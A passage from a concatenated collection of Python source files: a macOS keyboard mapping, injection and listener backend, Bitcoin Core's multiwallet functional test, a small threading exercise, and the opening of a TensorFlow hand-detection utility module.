Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource.restype = ctypes.c_void_p
Carbon.TISGetInputSourceProperty.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
Carbon.TISGetInputSourceProperty.restype = ctypes.c_void_p
Carbon.UCKeyTranslate.argtypes = [ctypes.c_void_p,
ctypes.c_uint16,
ctypes.c_uint16,
ctypes.c_uint32,
ctypes.c_uint32,
OptionBits, # keyTranslateOptions
ctypes.POINTER(ctypes.c_uint32), # deadKeyState
UniCharCount, # maxStringLength
ctypes.POINTER(UniCharCount), # actualStringLength
UniChar4]
Carbon.UCKeyTranslate.restype = ctypes.c_uint32
# Get keyboard layout
klis = Carbon.TISCopyCurrentKeyboardInputSource()
k_layout = Carbon.TISGetInputSourceProperty(klis, kTISPropertyUnicodeKeyLayoutData)
if k_layout is None:
klis = Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource()
k_layout = Carbon.TISGetInputSourceProperty(klis, kTISPropertyUnicodeKeyLayoutData)
k_layout_size = Carbon.CFDataGetLength(k_layout)
k_layout_buffer = ctypes.create_string_buffer(k_layout_size) # TODO - Verify this works instead of initializing with empty string
Carbon.CFDataGetBytes(k_layout, CFRange(0, k_layout_size), ctypes.byref(k_layout_buffer))
# Generate character representations of key codes
for key_code in range(0, 128):
# TODO - Possibly add alt modifier to key map
non_shifted_char = UniChar4()
shifted_char = UniChar4()
keys_down = ctypes.c_uint32()
char_count = UniCharCount()
retval = Carbon.UCKeyTranslate(k_layout_buffer,
key_code,
kUCKeyActionDisplay,
0, # No modifier
Carbon.LMGetKbdType(),
kUCKeyTranslateNoDeadKeysBit,
ctypes.byref(keys_down),
4,
ctypes.byref(char_count),
non_shifted_char)
non_shifted_key = u''.join(unichr(non_shifted_char[i]) for i in range(char_count.value))
retval = Carbon.UCKeyTranslate(k_layout_buffer,
key_code,
kUCKeyActionDisplay,
shiftKey >> 8, # Shift
Carbon.LMGetKbdType(),
kUCKeyTranslateNoDeadKeysBit,
ctypes.byref(keys_down),
4,
ctypes.byref(char_count),
shifted_char)
shifted_key = u''.join(unichr(shifted_char[i]) for i in range(char_count.value))
self.layout_specific_keys[key_code] = (non_shifted_key, shifted_key)
# Cleanup
Carbon.CFRelease(klis)
def character_to_vk(self, character):
""" Returns a tuple of (scan_code, modifiers) where ``scan_code`` is a numeric scan code
and ``modifiers`` is an array of string modifier names (like 'shift') """
for vk in self.non_layout_keys:
if self.non_layout_keys[vk] == character.lower():
return (vk, [])
for vk in self.layout_specific_keys:
if self.layout_specific_keys[vk][0] == character:
return (vk, [])
elif self.layout_specific_keys[vk][1] == character:
return (vk, ['shift'])
raise ValueError("Unrecognized character: {}".format(character))
def vk_to_character(self, vk, modifiers=[]):
""" Returns a character corresponding to the specified scan code (with given
modifiers applied) """
if vk in self.non_layout_keys:
# Not a character
return self.non_layout_keys[vk]
elif vk in self.layout_specific_keys:
if 'shift' in modifiers:
return self.layout_specific_keys[vk][1]
return self.layout_specific_keys[vk][0]
else:
# Invalid vk
raise ValueError("Invalid scan code: {}".format(vk))
class KeyController(object):
def __init__(self):
self.key_map = KeyMap()
self.current_modifiers = {
"shift": False,
"caps": False,
"alt": False,
"ctrl": False,
"cmd": False,
}
self.media_keys = {
'KEYTYPE_SOUND_UP': 0,
'KEYTYPE_SOUND_DOWN': 1,
'KEYTYPE_BRIGHTNESS_UP': 2,
'KEYTYPE_BRIGHTNESS_DOWN': 3,
'KEYTYPE_CAPS_LOCK': 4,
'KEYTYPE_HELP': 5,
'POWER_KEY': 6,
'KEYTYPE_MUTE': 7,
'UP_ARROW_KEY': 8,
'DOWN_ARROW_KEY': 9,
'KEYTYPE_NUM_LOCK': 10,
'KEYTYPE_CONTRAST_UP': 11,
'KEYTYPE_CONTRAST_DOWN': 12,
'KEYTYPE_LAUNCH_PANEL': 13,
'KEYTYPE_EJECT': 14,
'KEYTYPE_VIDMIRROR': 15,
'KEYTYPE_PLAY': 16,
'KEYTYPE_NEXT': 17,
'KEYTYPE_PREVIOUS': 18,
'KEYTYPE_FAST': 19,
'KEYTYPE_REWIND': 20,
'KEYTYPE_ILLUMINATION_UP': 21,
'KEYTYPE_ILLUMINATION_DOWN': 22,
'KEYTYPE_ILLUMINATION_TOGGLE': 23
}
def press(self, key_code):
""" Sends a 'down' event for the specified scan code """
if key_code >= 128:
# Media key
ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
14, # type
(0, 0), # location
0xa00, # flags
0, # timestamp
0, # window
0, # ctx
8, # subtype
((key_code-128) << 16) | (0xa << 8), # data1
-1 # data2
)
Quartz.CGEventPost(0, ev.CGEvent())
else:
# Regular key
# Apply modifiers if necessary
event_flags = 0
if self.current_modifiers["shift"]:
event_flags += Quartz.kCGEventFlagMaskShift
if self.current_modifiers["caps"]:
event_flags += Quartz.kCGEventFlagMaskAlphaShift
if self.current_modifiers["alt"]:
event_flags += Quartz.kCGEventFlagMaskAlternate
if self.current_modifiers["ctrl"]:
event_flags += Quartz.kCGEventFlagMaskControl
if self.current_modifiers["cmd"]:
event_flags += Quartz.kCGEventFlagMaskCommand
# Update modifiers if necessary
if key_code == 0x37: # cmd
self.current_modifiers["cmd"] = True
elif key_code == 0x38: # shift
self.current_modifiers["shift"] = True
elif key_code == 0x39: # caps lock
self.current_modifiers["caps"] = True
elif key_code == 0x3A: # alt
self.current_modifiers["alt"] = True
elif key_code == 0x3B: # ctrl
self.current_modifiers["ctrl"] = True
event = Quartz.CGEventCreateKeyboardEvent(None, key_code, True)
Quartz.CGEventSetFlags(event, event_flags)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
time.sleep(0.01)
def release(self, key_code):
""" Sends an 'up' event for the specified scan code """
if key_code >= 128:
# Media key
ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
14, # type
(0, 0), # location
0xb00, # flags
0, # timestamp
0, # window
0, # ctx
8, # subtype
((key_code-128) << 16) | (0xb << 8), # data1
-1 # data2
)
Quartz.CGEventPost(0, ev.CGEvent())
else:
# Regular key
# Update modifiers if necessary
if key_code == 0x37: # cmd
self.current_modifiers["cmd"] = False
elif key_code == 0x38: # shift
self.current_modifiers["shift"] = False
elif key_code == 0x39: # caps lock
self.current_modifiers["caps"] = False
elif key_code == 0x3A: # alt
self.current_modifiers["alt"] = False
elif key_code == 0x3B: # ctrl
self.current_modifiers["ctrl"] = False
# Apply modifiers if necessary
event_flags = 0
if self.current_modifiers["shift"]:
event_flags += Quartz.kCGEventFlagMaskShift
if self.current_modifiers["caps"]:
event_flags += Quartz.kCGEventFlagMaskAlphaShift
if self.current_modifiers["alt"]:
event_flags += Quartz.kCGEventFlagMaskAlternate
if self.current_modifiers["ctrl"]:
event_flags += Quartz.kCGEventFlagMaskControl
if self.current_modifiers["cmd"]:
event_flags += Quartz.kCGEventFlagMaskCommand
event = Quartz.CGEventCreateKeyboardEvent(None, key_code, False)
Quartz.CGEventSetFlags(event, event_flags)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
time.sleep(0.01)
def map_char(self, character):
if character in self.media_keys:
return (128+self.media_keys[character],[])
else:
return self.key_map.character_to_vk(character)
def map_scan_code(self, scan_code):
if scan_code >= 128:
character = [k for k, v in enumerate(self.media_keys) if v == scan_code-128]
if len(character):
return character[0]
return None
else:
return self.key_map.vk_to_character(scan_code)
class KeyEventListener(object):
def __init__(self, callback, blocking=False):
self.blocking = blocking
self.callback = callback
self.listening = True
self.tap = None
def run(self):
""" Creates a listener and loops while waiting for an event. Intended to run as
a background thread. """
self.tap = Quartz.CGEventTapCreate(
Quartz.kCGSessionEventTap,
Quartz.kCGHeadInsertEventTap,
Quartz.kCGEventTapOptionDefault,
Quartz.CGEventMaskBit(Quartz.kCGEventKeyDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventKeyUp) |
Quartz.CGEventMaskBit(Quartz.kCGEventFlagsChanged),
self.handler,
None)
loopsource = Quartz.CFMachPortCreateRunLoopSource(None, self.tap, 0)
loop = Quartz.CFRunLoopGetCurrent()
Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
Quartz.CGEventTapEnable(self.tap, True)
while self.listening:
Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)
def handler(self, proxy, e_type, event, refcon):
scan_code = Quartz.CGEventGetIntegerValueField(event, Quartz.kCGKeyboardEventKeycode)
key_name = name_from_scancode(scan_code)
flags = Quartz.CGEventGetFlags(event)
event_type = ""
is_keypad = (flags & Quartz.kCGEventFlagMaskNumericPad)
if e_type == Quartz.kCGEventKeyDown:
event_type = "down"
elif e_type == Quartz.kCGEventKeyUp:
event_type = "up"
elif e_type == Quartz.kCGEventFlagsChanged:
if key_name.endswith("shift") and (flags & Quartz.kCGEventFlagMaskShift):
event_type = "down"
elif key_name == "caps lock" and (flags & Quartz.kCGEventFlagMaskAlphaShift):
event_type = "down"
elif (key_name.endswith("option") or key_name.endswith("alt")) and (flags & Quartz.kCGEventFlagMaskAlternate):
event_type = "down"
elif key_name == "ctrl" and (flags & Quartz.kCGEventFlagMaskControl):
event_type = "down"
elif key_name == "command" and (flags & Quartz.kCGEventFlagMaskCommand):
event_type = "down"
else:
event_type = "up"
if self.blocking:
return None
self.callback(KeyboardEvent(event_type, scan_code, name=key_name, is_keypad=is_keypad))
return event
key_controller = KeyController()
""" Exported functions below """
def init():
key_controller = KeyController()
def press(scan_code):
""" Sends a 'down' event for the specified scan code """
key_controller.press(scan_code)
def release(scan_code):
""" Sends an 'up' event for the specified scan code """
key_controller.release(scan_code)
def map_char(character):
""" Returns a tuple of (scan_code, modifiers) where ``scan_code`` is a numeric scan code
and ``modifiers`` is an array of string modifier names (like 'shift') """
return key_controller.map_char(character)
def name_from_scancode(scan_code):
""" Returns the name or character associated with the specified key code """
return key_controller.map_scan_code(scan_code)
def listen(callback):
""" Adds all monitored keyboard events to queue. To use the listener, the script must be run
as root (administrator). Otherwise, it throws an OSError. """
if not os.geteuid() == 0:
raise OSError("Error 13 - Must be run as administrator")
listener = KeyEventListener(callback)
t = threading.Thread(target=listener.run, args=())
t.daemon = True
t.start()
def type_unicode(character):
OUTPUT_SOURCE = Quartz.CGEventSourceCreate(Quartz.kCGEventSourceStateHIDSystemState)
# Key down
event = Quartz.CGEventCreateKeyboardEvent(OUTPUT_SOURCE, 0, True)
Quartz.CGEventKeyboardSetUnicodeString(event, len(character.encode('utf-16-le')) // 2, character)
Quartz.CGEventPost(Quartz.kCGSessionEventTap, event)
# Key up
event = Quartz.CGEventCreateKeyboardEvent(OUTPUT_SOURCE, 0, False)
Quartz.CGEventKeyboardSetUnicodeString(event, len(character.encode('utf-16-le')) // 2, character)
Quartz.CGEventPost(Quartz.kCGSessionEventTap, event) |
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
FEATURE_LATEST = 169900
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for i in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': '' }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir('wallet.dat')), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
os.rename(wallet_dir("wallet.dat"), wallet_dir("w8"))
# create another dummy wallet for use in testing backups later
self.start_node(0, [])
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_dir("wallet.dat"), empty_wallet)
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly
# '' - to verify default wallet file is created correctly
wallet_names = ['w1', 'w2', 'w3', 'w', 'sub/w5', os.path.join(self.options.tmpdir, 'extern/w6'), 'w7_symlink', 'w8', '']
extra_args = ['-wallet={}'.format(n) for n in wallet_names]
self.start_node(0, extra_args)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8'])
assert_equal(set(node.listwallets()), set(wallet_names))
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
# should not initialize if wallet path can't be created
exp_stderr = "boost::filesystem::create_directory:"
self.nodes[0].assert_start_raises_init_error(['-wallet=wallet.dat/bad'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
# should not initialize if there are duplicate wallets
self.nodes[0].assert_start_raises_init_error(['-wallet=w1', '-wallet=w1'], 'Error: Error loading wallet w1. Duplicate -wallet filename specified.')
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
exp_stderr = r"BerkeleyBatch: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -zapwallettxes with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0, ['-wallet=w4', '-wallet=w5'])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-wallet=w4', '-wallet=w5', '-walletdir=' + data_dir()])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-walletdir=' + competing_wallet_dir])
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0, extra_args)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8', 'w8_copy'])
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
assert_raises_rpc_error(-18, 'Wallet wallets not found.', self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
assert_raises_rpc_error(-4, 'Wallet file verification failed. Error loading wallet w1. Duplicate -wallet filename specified.', self.nodes[0].loadwallet, wallet_names[0])
# Fail to load duplicate wallets by different ways (directory and filepath)
assert_raises_rpc_error(-4, "Wallet file verification failed. Error loading wallet wallet.dat. Duplicate -wallet filename specified.", self.nodes[0].loadwallet, 'wallet.dat')
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
assert_raises_rpc_error(-18, "Directory empty_wallet_dir does not contain a wallet.dat file", self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
assert_raises_rpc_error(-4, "Wallet w2 already exists.", self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Cannot unload the requested wallet", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found (wallet method is disabled because no wallet is loaded)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8', 'w8_copy', 'w9'])
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
01.py | import threading
from time import sleep
global bown
# funcao que espera 1 segundo
def wait():
cont = 0
global bown
while True:
bown = 0
print(cont)
cont += 1
sleep(1)
bown = 1
# print(bown)
def LerVelocidade():
global bown
while True:
if (bown == 1):
print('Leitura da Velocidade')
# ----------------criando a thread
#adicionar mutex
t = threading.Thread(target=wait, name='Wait')
t1 = threading.Thread(target=LerVelocidade, name='Velocidade')
t.start()
t1.start()
print("vou adicionar só algumas coisinhas pra ver se vai commitar")
#adicionando um comentario
#novamente testando
|
detector_utils.py | # Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
def get_centroid(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = int((left + right) / 2.0)
p2 = int((top+ bottom) / 2.0 )
centroid = (p1,p2)
if centroid is not None:
cv2.circle(image_np, centroid, 5, (0, 0, 255), 1)
return centroid
def get_box_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
centroid = (int(left/2), int(top/2))
return image_np[int(top):int(bottom), int(left):int(right)].copy()
#return centroid
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
